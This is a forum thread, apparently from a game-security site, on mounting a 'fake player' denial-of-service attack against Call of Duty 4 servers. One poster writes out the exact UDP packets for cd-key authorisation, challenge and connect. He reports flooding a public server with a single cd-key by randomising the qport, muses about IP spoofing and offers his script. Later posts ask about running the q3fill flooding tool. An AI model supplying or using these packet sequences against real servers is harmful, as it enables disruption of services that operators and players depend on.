Luigi Auriemma

hi there

i get this massage how could i solve it

game is COD4

COD4 is interesting, and I believe you are going to need a cd key for each player in order to successfully perform a fake player dos. I think the protocol differs slightly than the classic q3 protocols, but I haven't researched the classic ones so I couldn't tell you for sure. But I can tell what packets are sent when a user connects to a server, and Luigi might be able to work with this information to create something:

1)
Client -> cod4master.activision.com:20800
UDP Packet: \xff\xff\xff\xffgetKeyAuthorize 0 1234abcd1234abcd PB 76fec7a62184097987236446dba0f454

About: 1234abcd1234abcd is the first 16 characters of the cd key, and 76fec7a62184097987236446dba0f454 is the pb guid of that cdkey (based off the first 16 characters of the key, more info here: /cod4key2guid-t375.html). This 1 packet is sent to the master server, and no reply appears to ever be sent back. It's like a notification saying "hey master server, im going to be using this key just so you know" or something similar. I'll explain what happens later if you dont submit this packet

2)
Client -> cod4 server
UDP Packet: \xff\xff\xff\xffgetchallenge 0 "76fec7a62184097987236446dba0f454"

About: Once again the GUID is sent from your client requesting a challenge code, but this time it's sent to the cod4 server you're connecting to, not the master server.

3)
cod4 server -> Client
UDP Packet: various replies can be sent, see "about" below:

About: After the getchallenge string is sent to the cod4 server, the server will reply with 1 of 3 things from what I've found:

\xff\xff\xff\xffneedcdkey - from what I've noticed, this usually means the first packet (in #1) was never sent to the master server. It may have been sent, but considering the connection-less nature of UDP the packet may have been lost on the way, and never received by the master server.

\xff\xff\xff\xfferror\x0aEXE_ERR_CDKEY_IN_USE - this reply displays the word 'error' with a line feed (hex 0a), and then the error EXE_ERR_CDKEY_IN_USE. This error is obvious, the cd-key is in use, but I also seem to get this error when the cdkey is invalid. Might be an error on their part, but I can't ever seem to get a different reply when I use an invalid key. So don't let this fool you into thinking the cdkey is in use all the time.

\xff\xff\xff\xffchallengeResponse 123456789 - this means the key was NOT in use by another player, and was accepted by the cod4 server, and you were given a challenge response to be used further down the "connecting to server" road. This is what you probably want to see when performing the fake player DoS, but it requires a valid key to see.

If you were able to get a "challengeresponse" like the one above, you're still able to keep on going.

4)
Client -> cod4 server
UDP Packet: \xff\xff\xff\xffconnect "\cg_predictItems\1\cl_anonymous\0\cl_punkbuster\1\cl_voice\1\cl_wwwDownload\1\rate\25000\snaps\20\name\FakePlayer1\protocol\6\challenge\123456789\qport\-11037"

About: Pretty self explanatory. Looks like the client's settings that he wishes to use, along with his challenge string, player name, etc.

5)
cod4 server -> Client
UDP Packet: \xff\xff\xff\xffconnectResponse\x20

About: Just a string sent from the server with the hex character 20 at the end (space).

From here on out, it appears that the client and server first exchange the clients player stats, and then start exchanging encoded/encrypted/unreadable data. That is where I left off with my research, so hopefully you and/or luigi can use that information to improve upon the fake players DoS for q3 games. Enjoy, and good luck. Let me know if I need to clarify anything.

woow i cant understand what this whole things means :S

Well hopefully Luigi can take a look at it, and tell you if he thinks a fake player DoS is possible for COD4.

Basically, COD4 does things differently, and I was providing information about the protocol that might be able to help in creating fake players

nice work SomaFM, anyway I will not add the CoD4 authentication in q3fill since out of the purpose of the tool and because could make the code (or the options) too much chaotic

Edit: some of this information is incorrect, see my latest post for more info

I did a little further testing with this and I was successfully able to fill a slot. The slot is filled after the client sends the connect string to the server(see #4 in my post above), and the server has to reply with the "connectresponse" string (see #5 in my post above).

If the server gives any errors, no slot is ever filled and you will have to start the connection process over. However, once you are able to get the "connectresponse" string from the server, the client stays in the server player's list for about 15 seconds. Your fake player's name will show in the list (unlike other games such as BF2), so an admin is most likely able to ban your guid and/or IP address because he can see you -- this sort of ruins the idea of a "fake player DoS" since admins will probably just ban you :P

However, it's still possible to fill a server... but you need a unique cd-key for each fake player. Using a cd-key already that is already connected will either kick your fake player offline, or give you an error such as cdkey in use. I think you only get the "cdkey in use" error if the client is a fully connected "real" client, and not a fake player. I think this because I wasn't able to get a "cd-key in use" error during these latest tests... it would just kick my old fake player and connect with the new one. So this probably means the cd-key isn't globally registered as "in use" until the client is actually playing in a server on the key.

Lastly, the server must allow clients to have the same IP, or you will get that stupid "server for low pings only" error (see /q3fill-t450.html for more info). I think this is a dumb idea to have in a game anyway since multiple clients can be behind a natted IP...

Spoofing is probably not possible since you must be able to receive your challenge code from the server in order to connect. However, it may be possible to have your script get the challenge code, and then send the "connect string" on a spoofed ip. It's worth a shot, but it all depends on if the challenge can be used by an ip that it wasn't created on.

In the end, very interesting stuff. If you have 64 cd-keys you can flood pretty much any server :P. If anyone is interested in my php code I used to spoof 1 client, let me know and I can post it, but if you read my first post it should be very easy to write your own script.

Soma

Wow! Completely ignore my last post. I was able to successfully flood a server with 1 cd-key. The reason why I was having disconnect issues on my fake players in my last post is because I was using the same "qport" in my connect string. Simply generating a random qport (from 10000 - 65535) allowed me to completely fill a public server with 1 cd-key. So just use a random playername and qport, and it will work.

More to come...

Edit: Made a new thread with sample code, pictures, information on CoD4 fake players -- /fake-playe ... -t454.html

well done

Could some1 help me with this problem that I have.
When I try to open q3fill.exe , it shuts it in the same second I open it.
It flashes the cmd prompt guickly there but it won't keep opened.
I got Vista but that ain't the problem cause in my other PC it works like a dream,
anyone has any idea why this happens?
Or am I just a unlucky child :D

Yeye I forgot I need to open it in cmd prompt :D
Stupid me, sorry disturbing u :D